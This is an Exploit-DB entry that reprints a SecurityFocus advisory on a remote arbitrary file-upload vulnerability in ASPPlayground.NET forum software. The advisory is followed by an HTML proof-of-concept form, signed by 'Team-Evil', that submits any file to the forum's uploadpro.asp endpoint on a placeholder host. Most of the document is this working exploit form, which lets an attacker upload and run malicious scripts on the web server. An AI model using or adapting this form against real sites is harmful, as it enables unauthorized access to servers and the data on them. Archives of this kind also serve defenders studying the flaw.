https://www.exploit-db.com/exploits/25908

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/14070/info

ASPPlayground.NET is prone to a remote arbitrary file-upload vulnerability.

Exploiting this issue may allow remote attackers to upload arbitrary files including malicious scripts and possibly execute the scripts the affected server.

This issue can ultimately help attackers gain unauthorized access in the context of the webserver. 

http://www.example.com/forum/uploadpro.asp?memori=&deletefile=&mode=

refer to

http://www.example.com/forum/post.asp

*

ASP Playground html bug :
___________________________

<html>
<head>
<title>ASP Playground Version beta 3.2 SR1 upload Arbitrary Files
</title>

</table>
<br>
<table width="98%" border="0" cellspacing="0" cellpadding="0">

<form method="POST" action="http://www.example.com/forum/uploadpro.asp?

memori=&deletefile=&mode=" enctype="multipart/form-data"

onSubmit="return respondToUploader(this)">
<tr>
<td bgcolor="8d5a18">
<table width="100%" border="0" cellspacing="1"

cellpadding="4">
<tr>
<td bgcolor="f8fff3">
upload<br>
<input type="file" name="File1" size="22">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<hr size="1" noshade>
</td>
</tr>
<tr>
<td align="right">
<input type="submit" name="submit" value="upload">

</td>
</tr>
</form>

</table>
</body>
<center><b>pOWERED By Team-Evil [email protected]
</html>